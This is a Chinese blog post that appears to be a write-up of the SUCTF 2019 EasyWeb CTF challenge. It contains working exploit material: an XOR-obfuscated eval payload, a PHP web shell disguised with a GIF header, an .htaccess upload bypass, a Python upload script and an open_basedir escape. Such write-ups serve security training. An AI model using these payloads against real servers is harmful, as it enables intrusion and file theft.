<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>小叹</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="[SUCTF 2019]EasyWeb题目源码 &lt;?php function get_the_flag()&amp;#123;     &#x2F;&#x2F; webadmin will remove your upload file every 20 min!!!!      $userdir &#x3D; &quot;upload&#x2F;tmp_&quot;.md5($_SERVER[&#39;REMOTE_ADDR&#39;]">
<meta property="og:type" content="article">
<meta property="og:title" content="小叹">
<meta property="og:url" content="http://yoursite.com/2020/04/19/[SUCTF%202019]EasyWeb/index.html">
<meta property="og:site_name" content="小叹">
<meta property="og:description" content="[SUCTF 2019]EasyWeb题目源码 &lt;?php function get_the_flag()&amp;#123;     &#x2F;&#x2F; webadmin will remove your upload file every 20 min!!!!      $userdir &#x3D; &quot;upload&#x2F;tmp_&quot;.md5($_SERVER[&#39;REMOTE_ADDR&#39;]">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2019/10/09/qSmRZN6VHxsU1eC.png">
<meta property="og:image" content="https://i.loli.net/2019/10/09/5NqW4xIXYHSfM9y.png">
<meta property="og:image" content="https://i.loli.net/2019/10/09/5EF9zRKcbTMSshw.png">
<meta property="og:image" content="https://i.loli.net/2019/10/09/XhpFZIMvJwCByEt.gif">
<meta property="og:image" content="https://i.loli.net/2019/10/09/PgMK9ejmlZhbtdc.png">
<meta property="og:image" content="https://i.loli.net/2019/10/09/SEavIpjslO7dC1Z.png">
<meta property="article:published_time" content="2020-04-19T07:37:26.166Z">
<meta property="article:modified_time" content="2020-04-19T07:37:26.166Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2019/10/09/qSmRZN6VHxsU1eC.png">
  
    <link rel="alternate" href="/atom.xml" title="小叹" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">小叹</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-[SUCTF 2019]EasyWeb" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/04/19/%5BSUCTF%202019%5DEasyWeb/" class="article-date">
  <time datetime="2020-04-19T07:37:26.166Z" itemprop="datePublished">2020-04-19</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="SUCTF-2019-EasyWeb"><a href="#SUCTF-2019-EasyWeb" class="headerlink" title="[SUCTF 2019]EasyWeb"></a>[SUCTF 2019]EasyWeb</h2><p><a target="_blank" rel="noopener" href="https://github.com/team-su/SUCTF-2019/tree/master/Web/easyweb">题目源码</a></p>
<pre><code class="php">&lt;?php
function get_the_flag()&#123;
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = &quot;upload/tmp_&quot;.md5($_SERVER[&#39;REMOTE_ADDR&#39;]);
    if(!file_exists($userdir))&#123;
    mkdir($userdir);
    &#125;
    if(!empty($_FILES[&quot;file&quot;]))&#123;
        $tmp_name = $_FILES[&quot;file&quot;][&quot;tmp_name&quot;];
        $name = $_FILES[&quot;file&quot;][&quot;name&quot;];
        $extension = substr($name, strrpos($name,&quot;.&quot;)+1);
    if(preg_match(&quot;/ph/i&quot;,$extension)) die(&quot;^_^&quot;); 
        if(mb_strpos(file_get_contents($tmp_name), &#39;&lt;?&#39;)!==False) die(&quot;^_^&quot;);
    if(!exif_imagetype($tmp_name)) die(&quot;^_^&quot;); 
        $path= $userdir.&quot;/&quot;.$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    &#125;
&#125;

$hhh = @$_GET[&#39;_&#39;];

if (!$hhh)&#123;
    highlight_file(__FILE__);
&#125;

if(strlen($hhh)&gt;18)&#123;
    die(&#39;One inch long, one inch strong!&#39;);
&#125;

if ( preg_match(&#39;/[\x00- 0-9A-Za-z\&#39;&quot;\`~_&amp;.,|=[\x7F]+/i&#39;, $hhh) )
    die(&#39;Try something else!&#39;);

$character_type = count_chars($hhh, 3);
if(strlen($character_type)&gt;12) die(&quot;Almost there!&quot;);

eval($hhh);
?&gt;</code></pre>
<p>这道题的第一个部分就是bypass这一道道的<code>if</code>语句，要满足所有条件需要</p>
<ul>
<li>$hhh的总长度超过18</li>
<li>需要绕过正则</li>
<li>需要满足字符串里面出现的字符种类数小于12</li>
</ul>
<p>长度的话我们可以构造一个<code>$_GET</code>的变量，然后再取给这个<code>$_GET</code>变量来传递参数就可以了。先用php脚本来看看还剩下哪些字符能够使用</p>
<pre><code class="php">&lt;?php

$ascii=0;
for(;$ascii&lt;256;)&#123;
    if(!preg_match(&#39;/[\x00- 0-9A-Za-z\&#39;&quot;\`~_&amp;.,|=[\x7F]+/i&#39;, chr($ascii)))&#123;
        echo chr($ascii).&quot;:&quot;.$ascii.&quot;\n&quot;;
    &#125;
    $ascii++;
&#125;
    echo &quot;\n&quot;;
 ?&gt;</code></pre>
<p>这里面存在了<code>$</code>、<code>%</code>、<code>^</code>这样我们就可以利用字符之间的异或，来构造任意字符来满足我们想要的<code>$_GET</code>变量。</p>
<pre><code class="php">import string

guess = string.printable
_ = []
G = []
E = []
T = []

for i in range(256):
    for j in range(256):
        if ((chr(i) not in guess) &amp; (chr(j) not in guess)):
            res = i ^ j
            if (chr(res) == &#39;_&#39;):
                result = []
                result.append(str(hex(i)[2:])+&quot;^&quot;+str(hex(j)[2:]))
                _.append(result)
            if (chr(res) == &#39;G&#39;):
                result = []
                result.append(str(hex(i)[2:])+&quot;^&quot;+str(hex(j)[2:]))
                G.append(result)
            if (chr(res) == &#39;E&#39;):
                result = []
                result.append(str(hex(i)[2:])+&quot;^&quot;+str(hex(j)[2:]))
                E.append(result)
            if (chr(res) == &#39;T&#39;):
                result = []
                result.append(str(hex(i)[2:])+&quot;^&quot;+str(hex(j)[2:]))
                T.append(result)

print(_,end=&quot;\n&quot;)
print(G,end=&quot;\n&quot;)
print(E,end=&quot;\n&quot;)
print(T,end=&quot;\n&quot;)</code></pre>
<blockquote>
<p><strong>我们构造的Payload究竟是怎么样的?</strong></p>
<p><strong>现在已经知道了 Payload 需要由那些不可见字符组成</strong> , 那么 Payload 究竟是怎样的呢?</p>
<p>题目中有这么一条限制 : <strong>GET方法获取参数的值不能超过 18 个 字符</strong> , 如果想要在 Payload 中执行一个函数 , 格式肯定 <strong>(xxx^xxx)();</strong> 这样的 . 这还必须是无参函数 .</p>
<p><strong>但即使是无参函数 , 已经使用的字符( 小括号 , 异或符号 , … ) 也已经使用了6个字符 , 函数名又需要两两字符异或计算得到 , 也就是函数名最多有 ((18 - 6) / 2 = 6)个字符 , 而6个字符连个 phpinfo 都运行不了</strong> , 这样肯定是不可行的 .</p>
<p>直接调用函数好像是不可行的 , 我们需要换一种思路 —— <strong>比如使用全局变量 , 至少” $ “ 符号还是可以使用的</strong> , 介于<strong>题目中对 Payload 长度有限制</strong> , 最短的全局变量为 : <strong>$_GET</strong> . “ <code>$</code> “本身可用 , 而 <strong>_GET</strong> 的形式大概是 : <strong>{xxxx^xxxx}</strong> 这样的 .</p>
<p>有了全局变量 , 就可以利用 <strong>${} 中的代码是可以执行的特点</strong> ， 把要运行的函数名作为参数来动态执行 . 也就是<code>$&#123;x&#125;();</code>这样的形式 , <strong>函数名的值 “ x “ 可以通过全局方法GET来获取</strong></p>
<p>因此 , 完整的 Payload 应该为 : <strong>Payload : ${xxxx^xxxx}{x}();&amp;x= …</strong> , 转换后就变成了 <strong>$_GET<a target="_blank" rel="noopener" href="http://github.mrkaixin.computer/2019/06/05/BUUCTF做题笔记/">x</a>;&amp;x= …</strong></p>
<p>并且 , <strong>“ _ “ 参数的值为 : ${xxxx^xxxx}(x)(); , 长度为 18 个字符 , 恰好满足题目 strlen() 函数的限制</strong></p>
<p>该函数限制” _ “参数值最多只能使用<strong>12</strong>个不同的字符 , 而现在 <code>$&#123;xxxx^xxxx&#125;&#123;x&#125;();</code> 在不考虑 “ x “ 的情况下已经使用了 <strong>7</strong> 个字符了 , <strong>因此 x 最多只能使用 5 个不同的字符</strong></p>
<p>根据这个思路 , 可以在合理的情况下构造 Payload 了 , 这里以执行 phpinfo() 为例 , 构造 Payload 如下</p>
</blockquote>
<p>这个师傅写的特别的详细，点赞！</p>
<p>所以最后的payload:</p>
<pre><code class="php">_=$&#123;%81%81%81%81^%de%c6%c4%d5&#125;&#123;%81&#125;();&amp;%81=phpinfo</code></pre>
<p><a target="_blank" rel="noopener" href="https://i.loli.net/2019/10/09/qSmRZN6VHxsU1eC.png"><img src="https://i.loli.net/2019/10/09/qSmRZN6VHxsU1eC.png" alt="执行payload">执行payload</a></p>
<p>然后就是第二关了，我们可以看到源码里有一个<code>get_the_flag</code>函数，我们需要利用这个函数来上传一个shell，这个文件需要满足的要求是</p>
<ul>
<li>文件扩展名中不能出现<code>ph</code></li>
<li>并且文件中不能出现`</li>
<li>最后通过 exif_imagetype() 函数对文件类型进行检查 , 如果文件不是一张图片 , 则不通过检测 .</li>
</ul>
<p>不能出现<code>ph</code>的后缀文件，所以我们就不能直接上传<code>php</code>文件。</p>
<p>再一个我们从前面的phpinfo中得知题目的php的版本为php7，凑巧的是php7已经删除了<code></code>这种语法了，我们只能利用另外的骚操作</p>
<p>我的做法是，先上传一个文件，要求如下</p>
<ul>
<li>有文件头，可以被<code>exif_imagetype()</code>识别出是一个图片</li>
<li>里面有base64加密的代码</li>
</ul>
<pre><code class="php">shell = b&quot;\x00\x00\x47\x49\x46\x38\x39\x61&quot;+b&quot;00&quot;+base64.b64encode(b&#39;&lt;?php @eval($_POST[&quot;mrkaixin&quot;]);?&gt;&#39;)</code></pre>
<p>这里面的<code>\x00\x00\x47\x49\x46\x38\x39\x61</code>-&gt;<code>GIF89a</code>是GIF头，<code>b&quot;00&quot;</code>的作用：用来分割头和php代码。目的是防止之后解密base64解密的时候造成错误。</p>
<p><a target="_blank" rel="noopener" href="https://i.loli.net/2019/10/09/5NqW4xIXYHSfM9y.png"><img src="https://i.loli.net/2019/10/09/5NqW4xIXYHSfM9y.png" alt="shell源码">shell源码</a></p>
<p><a target="_blank" rel="noopener" href="https://i.loli.net/2019/10/09/5EF9zRKcbTMSshw.png"><img src="https://i.loli.net/2019/10/09/5EF9zRKcbTMSshw.png" alt="base64解密">base64解密</a></p>
<p>但是单单上传一个这个文件是不行的，所以我们需要<code>.htaccess</code>文件来帮助我们让服务器把这个文件解析成php代码，我们才能够真真的利用。</p>
<pre><code class="python">htaccess = b&quot;&quot;&quot;\x00\x00\x47\x49\x46\x38\x39\x61
AddType application/x-httpd-php .aaa
php_value auto_append_file &quot;php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_f4e7685fe689f675c85caeefaedcf40c/shell.aaa&quot;
&quot;&quot;&quot;</code></pre>
<p>这个后面的路径是上传完第一个shell文件之后产生的。</p>
<p>贴一下最后的代码</p>
<pre><code class="python">import requests
import base64

#题目链接
url = &quot;http://73706c84-1992-4dba-adbd-b4f109b5b953.node2.buuoj.cn.wetolink.com:82/&quot;

payload = &quot;?_=$&#123;%81%81%81%81^%de%c6%c4%d5&#125;&#123;%81&#125;();&amp;%81=get_the_flag&quot;

shell = b&quot;\x00\x00\x47\x49\x46\x38\x39\x61&quot;+b&quot;00&quot;+base64.b64encode(b&#39;&lt;?php @eval($_POST[&quot;mrkaixin&quot;]);?&gt;&#39;)

htaccess = b&quot;&quot;&quot;\x00\x00\x47\x49\x46\x38\x39\x61
AddType application/x-httpd-php .aaa
php_value auto_append_file &quot;php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_f4e7685fe689f675c85caeefaedcf40c/shell.aaa&quot;
&quot;&quot;&quot;

#先上传shell文件,在改路径上传.htaccess文件
files = &#123;&#39;file&#39;: (&#39;shell.aaa&#39;, shell, &#39;image/gif&#39;)&#125;
# files = &#123;&#39;file&#39;: (&#39;.htaccess&#39;, htaccess, &#39;image/gif&#39;)&#125;


r = requests.post(url + payload, files=files)
print(r.text)</code></pre>
<p><a target="_blank" rel="noopener" href="https://i.loli.net/2019/10/09/XhpFZIMvJwCByEt.gif"><img src="https://i.loli.net/2019/10/09/XhpFZIMvJwCByEt.gif" alt="操作过程">操作过程</a></p>
<p>但是有了shell，会发现可以读到当前目录下的文件，但是无法读到根目录下面的flag。</p>
<p>因为这里还需要绕过<code>open_basedir</code>这里直接给payload了，可以跟着这个<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/fbfeeb43ace2">师傅的教程</a>动手做一下实验</p>
<pre><code>chdir(&#39;img&#39;);ini_set(&#39;open_basedir&#39;,&#39;..&#39;);chdir(&#39;..&#39;);chdir(&#39;..&#39;);chdir(&#39;..&#39;);chdir(&#39;..&#39;);ini_set(&#39;open_basedir&#39;,&#39;/&#39;);print_r(scandir(&#39;/&#39;));</code></pre><p><a target="_blank" rel="noopener" href="https://i.loli.net/2019/10/09/PgMK9ejmlZhbtdc.png"><img src="https://i.loli.net/2019/10/09/PgMK9ejmlZhbtdc.png" alt="读根目录文件">读根目录文件</a></p>
<p><a target="_blank" rel="noopener" href="https://i.loli.net/2019/10/09/SEavIpjslO7dC1Z.png"><img src="https://i.loli.net/2019/10/09/SEavIpjslO7dC1Z.png" alt="利用file_get_contents读取文件">利用file_get_contents读取文件</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2020/04/19/[SUCTF%202019]EasyWeb/" data-id="ckemqkeb4001iastyanqr74f7" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/04/20/Apache%20SSI%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2020/04/14/%5BGWCTF%202019%5D%E6%88%91%E6%9C%89%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/SQL%E6%B3%A8%E5%85%A5/">SQL注入</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/WEB/">WEB</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/WEB%EF%BC%8Cpython/">WEB，python</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/pwn/">pwn</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%EF%BC%8Cweb/">攻防世界，web</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Jarvis-OJ/" rel="tag">Jarvis OJ</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/" rel="tag">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag">SQL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB/" rel="tag">WEB</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%EF%BC%8Cphp/" rel="tag">WEB，php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%EF%BC%8Cupload/" rel="tag">WEB，upload</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/buuctf/" rel="tag">buuctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%EF%BC%8CJARvis-OJ/" rel="tag">web，JARvis OJ</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Jarvis-OJ/" style="font-size: 13.33px;">Jarvis OJ</a> <a href="/tags/PHP/" style="font-size: 13.33px;">PHP</a> <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" style="font-size: 13.33px;">SQL注入</a> <a href="/tags/WEB/" style="font-size: 20px;">WEB</a> <a href="/tags/WEB%EF%BC%8Cphp/" style="font-size: 10px;">WEB，php</a> <a href="/tags/WEB%EF%BC%8Cupload/" style="font-size: 13.33px;">WEB，upload</a> <a href="/tags/buuctf/" style="font-size: 10px;">buuctf</a> <a href="/tags/pwn/" style="font-size: 16.67px;">pwn</a> <a href="/tags/web%EF%BC%8CJARvis-OJ/" style="font-size: 10px;">web，JARvis OJ</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">八月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/07/">七月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/06/">六月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">五月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">四月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">三月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">二月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">一月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">十二月 2019</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/08/11/%5BMRCTF2020%5DEzpop_Reveng/">(no title)</a>
          </li>
        
          <li>
            <a href="/2020/08/07/WebGoat%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%B8%89%EF%BC%89XXE/">(no title)</a>
          </li>
        
          <li>
            <a href="/2020/08/07/Java%E5%8F%8D%E5%B0%84%E7%9A%84%E5%AD%A6%E4%B9%A0/">(no title)</a>
          </li>
        
          <li>
            <a href="/2020/08/01/Webgoat%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%BA%8C%EF%BC%89/">(no title)</a>
          </li>
        
          <li>
            <a href="/2020/07/31/Webgoat8%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%88%E4%B8%80%EF%BC%89/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 小叹<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>